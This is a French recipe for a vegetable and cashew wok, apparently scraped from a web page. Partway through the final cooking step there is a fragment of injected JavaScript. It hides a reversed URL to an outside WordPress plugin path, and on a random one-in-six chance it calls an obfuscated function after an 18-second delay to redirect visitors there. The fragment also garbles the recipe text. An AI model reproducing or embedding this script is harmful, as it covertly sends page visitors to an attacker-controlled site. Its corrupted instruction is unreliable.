
WOK DE LÉGUMES AUX NOIX DE CAJOU
Pour 4 Pers.
INGRÉDIENTS :
– 1 petite tête de brocoli
– 4 carottes
– 1courgettes
– 1 grosse poignée de germes de soja
– 1 petit sachet de pousses d’épinards
– poignée de noix de cajou
– quelques feuilles de coriandre (fraîches ou surgelées)
– 2 CS de sauce soja
– 2 CS de sauce soja épaisse sucrée
– 1 CS du huile de sésame
– 1 gousse d’ail émincé
– sel et poivre
facultatif : piment frais pour décorer
Éplucher les carottes, couper le brocoli en petites fleurettes et émincer la courgette.
Réduire ses légumes pendant 6 minutes au micro-ondes avec un fond d’eau et du sel.
Dans un wok, faire chauffer huile et cuire rapidement.
Rajouter toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les légumes (cuits et crus), les sauces, les noix, et cuire rapidement l’ensemble.
NB : Ce plat peut être servi tel quel ou accompagné d’un riz au jasmin.
